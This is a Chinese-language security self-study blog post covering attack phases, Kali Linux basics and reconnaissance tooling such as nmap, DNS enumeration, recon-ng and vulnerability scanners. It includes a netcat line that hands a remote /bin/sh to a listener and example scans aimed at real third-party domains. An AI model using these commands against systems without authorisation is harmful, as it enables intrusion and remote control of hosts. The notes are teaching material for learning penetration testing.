<!DOCTYPE html>









<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en"
  
>

  <!-- The Head -->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  >

  
    

    
  

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="安全笔记概论" />
<meta property="og:locale" content="en" />
<meta name="description" content="自学笔记" />
<meta property="og:description" content="自学笔记" />
<link rel="canonical" href="http://c0ldstudy.github.io/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/" />
<meta property="og:url" content="http://c0ldstudy.github.io/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/" />
<meta property="og:site_name" content="c0ldstudy" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2017-10-27T00:00:00-07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="安全笔记概论" />
<meta name="twitter:site" content="@JiacenXu" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2017-10-27T00:00:00-07:00","datePublished":"2017-10-27T00:00:00-07:00","description":"自学笔记","headline":"安全笔记概论","mainEntityOfPage":{"@type":"WebPage","@id":"http://c0ldstudy.github.io/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/"},"url":"http://c0ldstudy.github.io/posts/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>安全笔记概论 | c0ldstudy
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="c0ldstudy">
<meta name="application-name" content="c0ldstudy">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">
  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.2.1/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.20.1/dist/tocbot.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.1/dist/jquery.min.js"></script>

  
    <!--
  Switch the mode between dark and light.
-->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get MODE_ATTR() { return "data-mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }
    static get ID() { return "mode-toggle"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener('change', () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }
          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();
      });
    } /* constructor() */

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage({
        direction: ModeToggle.ID,
        message: this.modeStatus
      }, "*");
    }

    flipMode() {
      if (this.hasMode) {
        if (this.isSysDarkPrefer) {
          if (this.isLightMode) {
            this.clearMode();
          } else {
            this.setLight();
          }
        } else {
          if (this.isDarkMode) {
            this.clearMode();
          } else {
            this.setDark();
          }
        }
      } else {
        if (this.isSysDarkPrefer) {
          this.setLight();
        } else {
          this.setDark();
        }
      }

      this.notify();
    } /* flipMode() */
  } /* ModeToggle */

  const modeToggle = new ModeToggle();
</script>

  
</head>


  <body data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" class="mx-auto">
        
          
          <img src="/commons/avatar.png" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title">
      <a href="/">c0ldstudy</a>
    </div>
    <div class="site-subtitle font-italic">Absorb what is useful. Reject what is useless. And add what is essentially your own. --- Bruce Lee</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    
      <button class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
      <a href="https://github.com/c0ldstudy" aria-label="github"
        

        
          target="_blank"
          
        

        

        rel="noopener noreferrer">

        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/JiacenXu" aria-label="twitter"
        

        
          target="_blank"
          
        

        

        rel="noopener noreferrer">

        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="javascript:location.href = 'mailto:' + ['jiacenx','uci.edu'].join('@')" aria-label="email"
        

        

        

        >

        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        

        

        

        >

        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper">
  <div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>安全笔记概论</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div id="main" class="container pl-xl-4 pr-xl-4">
        





<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4">
    <div class="post pl-1 pr-1 pl-md-2 pr-md-2">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->


<!-- images -->





<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  

  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    
      

      
      

      
      
      

      

    

    

  




<!-- return -->

<h1 data-toc-skip>安全笔记概论</h1>

<div class="post-meta text-muted">
    <!-- published date -->
    <span>
      Posted
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1509087600"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Oct 27, 2017
</em>

    </span>

    <!-- lastmod date -->
    

  

  <div class="d-flex justify-content-between">
    <!-- author(s) -->
    <span>
      

      By

      <em>
      
        <a href="https://twitter.com/JiacenXu">Jiacen (Jason) Xu</a>
      
      </em>
    </span>

    <div>
      <!-- page views -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="2411 words">
  <em>13 min</em> read</span>

    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <h3 id="1-概论"><span class="mr-2">1 概论</span><a href="#1-概论" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>攻击流程
    <ul>
      <li>预攻击：收集信息，进行决策</li>
      <li>攻击：进行攻击，获得权限，进行渗透</li>
      <li>后攻击：长期控守，维持权限，消除痕迹</li>
    </ul>
  </li>
  <li>APT攻击（高级持续性攻击）
    <ul>
      <li>定向信息收集：针对性收集，包括网络隐蔽扫描和社工方法</li>
      <li>外网攻击突破：恶意代码攻击个人终端或者单位服务器</li>
      <li>构建控制通道：采用HTTP、HTTPS、DNS等协议，绕过安全防护设备</li>
      <li>内部横向渗透：以终端主机和DMZ区，在系统内部多层渗透，攻击更多服务器获得更多权限。</li>
      <li>数据收集上传</li>
      <li>攻击痕迹清理</li>
    </ul>
  </li>
  <li>知识框架
    <ul>
      <li>信息收集</li>
      <li>突防攻击</li>
      <li>隐蔽控守</li>
    </ul>
  </li>
</ul>

<h3 id="2-kali-linux基础"><span class="mr-2">2. Kali Linux基础</span><a href="#2-kali-linux基础" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h5 id="21-linux分支"><span class="mr-2">2.1 linux分支</span><a href="#21-linux分支" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre>* RedHat
	* CentOS
	*  RedHat
* Debian
	* Ubuntu 
	* Linxu
* Slackware
* 查看内核版本号
	* uname -a
	* cat /proc/version cat /etc/issue
	* cat /etc/os-release 
</pre></td></tr></tbody></table></code></div></div>

<h5 id="22-kali基础介绍"><span class="mr-2">2.2 Kali基础介绍</span><a href="#22-kali基础介绍" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<ul>
  <li>Linux文件目录结构
    <ul>
      <li>etc 配置目录</li>
      <li>bin 用户自带的可执行文件 or /usr/bin</li>
      <li>boot 引导</li>
      <li>media 虚拟机共享目录</li>
      <li>mnt 	U盘加载目录</li>
      <li>proc 查看进程信息</li>
      <li>sbin	系统自带的可执行文件（system）</li>
      <li>tmp 临时目录（重启全部清空，所有用户都能读写）</li>
      <li>usr 用户安装软件 工具在/usr/share路径下</li>
    </ul>
  </li>
  <li>Kali基本操作
    <ul>
      <li>ifconfig
        <ul>
          <li>lo：本地回环127.0.0.1</li>
        </ul>
      </li>
      <li>ln创建链接
        <ul>
          <li>硬链接：文件的两个副本</li>
          <li>符号链接：快捷方式 ln -s 源文件 链接文件</li>
        </ul>
      </li>
      <li>more：按页显示文件</li>
      <li>less：按页显示文件，可以翻页</li>
      <li>head -n file：显示文件前n行</li>
      <li>tail -n file：显示文件后n行</li>
      <li>umask 设置文件权限屏蔽位，取反即是新建文件默认权限</li>
      <li>chown user file 修改文件所有者</li>
      <li>chgrp 修改文件所有组</li>
      <li>
        <p>对应后缀的文件加密</p>

        <div class="table-wrapper"><table>
          <thead>
            <tr>
              <th>命令</th>
              <th>文件后缀</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>gzip,gunzip</td>
              <td>.gz</td>
            </tr>
            <tr>
              <td>zip,unzip</td>
              <td>.zip</td>
            </tr>
            <tr>
              <td>tar</td>
              <td>.tar</td>
            </tr>
            <tr>
              <td>compress,bzip2</td>
              <td>.bz2</td>
            </tr>
          </tbody>
        </table></div>
      </li>
      <li>磁盘管理命令
        <ul>
          <li>du 显示文件和目录空间占用情况</li>
          <li>df 显示磁盘文件系统的相关信息</li>
          <li>mount/umount 安装/卸载文件系统</li>
        </ul>
      </li>
      <li>用户管理
        <ul>
          <li>id 显示当前用户信息</li>
          <li>adduser 增加用户</li>
          <li>passwd 	更改用户密码</li>
          <li>userdel	删除用户</li>
          <li>traceroute 测试和远程主机的路由情况</li>
          <li>ps 显示进程及状态</li>
          <li>kill [进程id]杀死进程</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>netstat -t	//只看tcp连接
    <ul>
      <li>netstat -nt //不将IP地址反向解析为主机名或域名</li>
      <li>netstat -ant	//本机监听连接（all）</li>
      <li>netstat -antp  //process与进程关联起来</li>
      <li>windows： netstat -an -p tcp</li>
      <li><code class="language-plaintext highlighter-rouge">ps -aux | grep 2120</code> //打印所有进程，匹配2120进程</li>
      <li>postgresql 5432端口</li>
    </ul>
  </li>
  <li>网卡配置(配置静态IP地址)：
    <ul>
      <li>修改网卡配置/etc/network/interfaces
        <ul>
          <li>auto eth0</li>
          <li>iface eth0 inet static</li>
          <li>address 192.168.80.30</li>
          <li>netmask</li>
          <li>geteway</li>
        </ul>
      </li>
      <li>修改域名服务器地址 /etc/resolv.conf</li>
      <li>重启网络: /etc/init.d/networking restart or reboot</li>
    </ul>
  </li>
  <li>Kali 服务管理
    <ul>
      <li>Web服务器根目录 /var/www/html/</li>
      <li>apache2/postgresql</li>
      <li>配置服务自启动：update-rc.d postgresql enable</li>
    </ul>
  </li>
  <li>
    <p>替换更新源为国内源/etc/apt/sources.list</p>

    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>  中科大kali源
  deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
  deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
  阿里云kali源
  deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib    * advanced package tool(apt)   * apt-get update/upgrade 	//下载更新列表/更新对应软件   * apt-get dist-upgrade		//下载对应依赖包   * apt-get clean				//清除冗余文件
</pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>Vmware Tools(滚动更新版)
    <ul>
      <li>apt -y install open-vm-tools-desktop fuse</li>
      <li>reboot</li>
    </ul>
  </li>
  <li>安装VPN
    <ul>
      <li>安装openvpn</li>
    </ul>
  </li>
</ul>

<h5 id="23-kali-进阶使用"><span class="mr-2">2.3 Kali 进阶使用</span><a href="#23-kali-进阶使用" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<ul>
  <li>环境变量
    <ul>
      <li>env
        <ul>
          <li><code class="language-plaintext highlighter-rouge">env | grep -i path</code> //-i忽略大小写</li>
          <li>echo $PATH</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>搜索
    <ul>
      <li>whereis/which ifconfig //在$PATH和$MANPATH能找到ifconfig/在$PATH</li>
      <li>locate 在updatedb数据库中匹配字符串</li>
      <li>find /（指定目录） -type f（文件）、d（目录） -name（指定名称）</li>
    </ul>
  </li>
  <li>netcat 瑞士军刀
    <ul>
      <li>nc -nlp <port> -vv 监听端口
</port>        <ul>
          <li>nc -p 443 指定端口号监听443端口</li>
          <li>nc -l 监听（服务端）</li>
          <li>nc -n 不解析域名</li>
          <li>nc -vv 详细信息</li>
          <li>实现服务器端获得客户端的shell
            <ul>
              <li>nc -lnp &lt;（服务器端）ip&gt; <port>  //服务器监听开启</port></li>
              <li>nc &lt;（服务器）ip&gt; <port> -e（执行程序） /bin/sh  //客户端把shell传递给服务器，就可以在服务器上输入指令控制客户端</port></li>
              <li>/bin/sh linux类似于Windows的cmd接口程序</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
  <li>kali服务器客户端
    <ul>
      <li>python轻量级web服务器
        <ul>
          <li>python -m SimpleHTTPServer 80</li>
        </ul>
      </li>
      <li>wget <ip> -O /tmp/1.exe		//-O实现在指定目录下保存</ip></li>
    </ul>
  </li>
  <li>软件工具的安装
    <ul>
      <li>apt
        <ul>
          <li>apt-cache search/show packagename 搜索包</li>
          <li>apt-get install packagename –reinstall 安装/重新安装</li>
          <li>apt-get remove packagename 删除包</li>
          <li>apt-get autoclean 清理无用包</li>
          <li>apt-get check 检查是否有损害</li>
        </ul>
      </li>
      <li>dpkg
        <ul>
          <li>dbkg -i package-deb</li>
        </ul>
      </li>
      <li>git</li>
      <li>下载源代码压缩包
        <ul>
          <li>wget <ip>(tgz)</ip></li>
          <li>tar -xzvf archive.tar.gz</li>
          <li>./configure</li>
          <li>make</li>
          <li>make install</li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h3 id="3-信息收集"><span class="mr-2">3. 信息收集</span><a href="#3-信息收集" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<h5 id="31-网络信息收集"><span class="mr-2">3.1 网络信息收集</span><a href="#31-网络信息收集" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<ul>
  <li>网络信息收集
    <ul>
      <li>whois数据库：查询Internet注册信息的标准协议、域名提供商、域名服务器
        <ul>
          <li>whois <ip></ip></li>
        </ul>
      </li>
      <li>域名查询：查询DNS服务器
        <ul>
          <li>nslookup
            <ul>
              <li>baidu.com</li>
              <li>set type=ns/A/mx</li>
              <li>server ns1.cnhubei.com</li>
              <li>ls cnhubei.com</li>
            </ul>
          </li>
          <li>host -t mx baidu.com
            <ul>
              <li>host -l sda.gov.cn ns.sda.gov.cn //发请求到域名服务器要求列出子域名</li>
            </ul>
          </li>
          <li>dig命令
            <ul>
              <li>dig ns sda.gov.cn</li>
              <li>dig axfr</li>
            </ul>
          </li>
          <li>dnsenum –enum sda.gov.cn</li>
          <li>fierce:域名猜测
            <ul>
              <li>fierce -dns 163.com -wordlist dns-names.txt -threads 50 //同时起50个线程根据提供的字典猜测子域名</li>
              <li>自带字典位置：/usr/share/fierce/hosts.txt</li>
              <li><code class="language-plaintext highlighter-rouge">cat 163.com.dns.txt | awk -F'/t' '{printf"%s\t%s\n",$2,$1}' | sort</code> //按照需求分割</li>
              <li>awk文本处理工具 -F分割域</li>
              <li>windows使用layer子域名查询机</li>
            </ul>
          </li>
          <li>DNS域传送泄露（域名遍历）漏洞：DNS服务器不加确认就向对方提供域名数据库备份</li>
        </ul>
      </li>
      <li>基于搜索引擎的信息探测
        <ul>
          <li>google/baidu
            <ul>
              <li>site:sjtu.edu.cn根据域名搜索</li>
              <li>filetype:php 搜索PHP界面</li>
              <li>inurl:login		url中包括哪些关键词</li>
              <li>intitile：		//在网页标题中包含的</li>
              <li>intext：			//在内容中包含的</li>
              <li>link</li>
            </ul>
          </li>
          <li>Google Hacking Database 黑客搜索语句的数据库
            <ul>
              <li>基于GHDB的SiteDigger</li>
            </ul>
          </li>
          <li>theharvester -d hrw.org -b all //搜索邮件</li>
          <li>maltego互联网情报收集平台，社工工具
            <ul>
              <li>maltegoce</li>
              <li>输入目标域名：Infrastructure -&gt;拖拽domain节点</li>
            </ul>
          </li>
          <li>recon-ng
            <ul>
              <li>use recon/domains-hosts/bing_domain_web</li>
              <li>set source sjtu.edu.cn</li>
              <li>数据库位置 /.recon-ng/workspaces/default</li>
              <li>用火狐打开firefox resutl.html</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
  <li>主机信息收集
    <ul>
      <li>主机端口及服务
        <ul>
          <li>Netbios文件共享服务 端口号135-139,445(windows专有)</li>
        </ul>
      </li>
      <li>端口扫描
        <ul>
          <li>常规扫描，三次握手。调用socket库中connect函数
            <ul>
              <li>Nmap扫描器
                <ul>
                  <li>TCP SYN扫描
                    <ul>
                      <li>扫描结果分为三种
                        <ul>
                          <li>open		开放的端口</li>
                          <li>reset	不提供服务的端口</li>
                          <li>close	防火墙过滤</li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li>TCP FIN扫描（误报很多）
                    <ul>
                      <li>没有回应	开放端口</li>
                      <li>RST重置	不提供服务的端口</li>
                    </ul>
                  </li>
                  <li>使用libpcap</li>
                  <li>-Pn 认定所有主机在线，跳过主机发现</li>
                  <li>nmap -sP <ip></ip></li>
                  <li>nmap -sT 172.16.1.1-254 -p 139,445 -Pn –open		//-Pn不ping对方</li>
                  <li>nmap 脚本位置： /usr/share/nmap/scripts</li>
                  <li>nmap脚本类型 <strong><em>看一遍</em></strong>
                    <ul>
                      <li>auth: 负责处理认证证书(绕开认证)的脚本;</li>
                      <li>broadcast: 在局域网内探查更多服务开启状况，如dhcp/dns/sqlserver等服务;</li>
                      <li>brute: 提供暴力破解方式，针对常见的应用如http/snmp等;</li>
                      <li>default: 使用-sC或-A选项扫描时候默认的脚本，提供基本脚本扫描能力;</li>
                      <li>discovery: 对网络进行更多的信息，如SMB枚举、SNMP查询等;</li>
                      <li>dos: 用于进行拒绝服务攻击;</li>
                      <li>exploit: 利用已知的漏洞攻击系统;</li>
                      <li>external: 利用第三方的数据库或资源，例如进行whois解析;</li>
                      <li>fuzzer: 模糊测试，发送异常的包到目标机，探测潜在漏洞;</li>
                      <li>intrusive: 带有入侵性，可能引发对方的IDS/IPS的记录或屏蔽;</li>
                      <li>malware: 探测目标机是否感染了病毒、开启了后门等信息;</li>
                      <li>safe: 与intrusive相反，属于安全性脚本;</li>
                      <li>version: 增强服务与版本扫描(Version Detection)功能;</li>
                      <li>vuln: 检查目标机是否有常见的漏洞(Vulnerability)，如MS08_067、MS17_010等。</li>
                      <li>smb-vuln-ms17-010.nse  //永恒之蓝漏洞检测脚本</li>
                    </ul>
                  </li>
                  <li>nmap常规用法
                    <ul>
                      <li>nmap -sT(常规三次握手协议) -sS(SYN扫描) -Pn（扫描时不去ping对方）</li>
                      <li>nmap –script=default -Pn <ip地址></ip地址></li>
                      <li>nmap –script=smb-vuln* -Pn <ip地址></ip地址></li>
                      <li>nmap -A -Pn 192.168.80.201  //综合性扫描-A</li>
                      <li>nmap -sS -Pn -p 21-23,25,80,110,135- 139,143,443,445,1433,1521,3306,3389,5556,5631,5900,8080 192.168.80.1-254 –open   //扫描特定端口</li>
                    </ul>
                  </li>
                  <li>nmap图形化前端Zenmap</li>
                </ul>
              </li>
              <li>nc 172.16.1.201 80
                <ul>
                  <li>
                    <p>HEAD只回应头部数据，扫描时使用，可以得到旗标信息banner</p>

                    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>  方法1：
  HEAD / HTTP/1.1
  HOST:172.16.1.201
  方法2：
  GET /HTTP/1.1
  HOST:172.16.1.201
</pre></td></tr></tbody></table></code></div>                    </div>
                  </li>
                  <li>nginx 顺序上服务器信息在前，日期在后</li>
                  <li>apache 与nginx相反，日期信息在前，服务器信息在后</li>
                </ul>
              </li>
            </ul>
          </li>
        </ul>
      </li>
      <li>
        <p>主机操作系统的探测
   	* nmap-os-db操作系统指纹数据库不断更新
   	* nmap -sS 172.16.1.201 -Pn -p 139,445,80 -O  //-O操作系统·
   	* -sT（发送ACK包） -sS（发送SYN包） -sV（根据开放端口获取系统信息） -Pn -p -O（搜索操作系统）</p>
      </li>
      <li>漏洞扫描
        <ul>
          <li>CVE(Common Vulnerability Exposures)通用漏洞披露库: 设置漏洞编号</li>
          <li>NVD(National Vulnerability Database): 多个CVE安全漏洞详细信息</li>
          <li>Nessus: 综合性漏洞探测 <strong><em>（注册一波）</em></strong>
            <ul>
              <li>扫描策略</li>
              <li>扫描目标</li>
              <li>扫描结果</li>
            </ul>
          </li>
          <li>OpenVas kali自带，不好用</li>
        </ul>
      </li>
      <li>Web漏洞探测
        <ul>
          <li>w3af: Web Application Attack Framework</li>
          <li>nikto</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>局域网信息搜索
    <ul>
      <li>主机发现
        <ul>
          <li>ICMP协议<strong><em>研究一波</em></strong>（存在ICMP广播风暴，使用已经过时）
            <ul>
              <li>8字节，1个自己type，1个字节code</li>
              <li>echo request 8 0</li>
              <li>echo reply 0 0</li>
            </ul>
          </li>
          <li>ARP，Address Resolution Protocol(链路层)：寻找哪个IP地址对应的Mac地址为目的地址，对应发送数据包
            <ul>
              <li>ARP协议解析过程<strong><em>研究一波</em></strong></li>
              <li>IPv4(网络层)</li>
              <li>数据包寻址通过Mac地址</li>
              <li>ARP命令
                <ul>
                  <li>-a</li>
                </ul>
              </li>
            </ul>
          </li>
        </ul>
      </li>
      <li>NetDiscover找局域网中存货主机</li>
    </ul>
  </li>
</ul>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/tags/security/"
          class="post-tag no-text-decoration" >Security</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    
    

    
      
